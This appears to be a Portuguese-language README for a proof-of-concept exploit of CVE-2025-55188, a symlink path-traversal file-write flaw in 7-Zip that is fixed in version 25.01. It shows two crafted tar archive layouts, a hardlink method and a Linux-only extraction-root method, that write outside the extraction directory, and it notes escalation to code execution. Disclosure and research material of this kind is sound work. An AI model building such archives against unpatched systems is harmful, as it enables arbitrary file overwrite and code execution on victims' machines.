
Exploit de prova de conceito para CVE-2025-55188 demonstrando escrita arbitrária de arquivos no 7-Zip via path traversal com symlink, com escalonamento para execução arbitrária de código.
Prova de conceito do CVE-2025-55188, uma escrita arbitrária de arquivos no 7-Zip. Corrigido na versão 25.01, lançada em 3 de agosto de 2025.
Nota: CVE-2025-55188 é diferente do CVE-2025-11001.
A versão em que o CVE-2025-11001 foi corrigido (versão 25.00) ainda é vulnerável a execução arbitrária de código via ataques de link simbólico devido ao CVE-2025-55188.
O CVE-2025-55188 foi descoberto e publicado antes da publicação do CVE-2025-11001.
Veja https://lunbun.dev/blog/cve-2025-55188/ para uma explicação mais detalhada e relatório.
A vulnerabilidade é bastante direta.
O path traversal é realizado por meio de links simbólicos para escrever arquivos arbitrariamente. A partir daí, a escrita arbitrária de arquivos pode ser escalada para execução arbitrária de código escrevendo em arquivos críticos.
O path traversal por link simbólico é possível devido a um caso extremo nas verificações de segurança de links simbólicos. Encontrei duas maneiras de fazer isso. Veja o post do blog para mais detalhes.
O seguinte arquivo .tar escreverá em ../a/b/file.txt na extração:
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_hardlink contém código que utiliza o método de hardlink.
O seguinte arquivo .tar escreverá em ../file.txt na extração (apenas no Linux):
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_extraction_root contém código que utiliza o método de raiz de extração.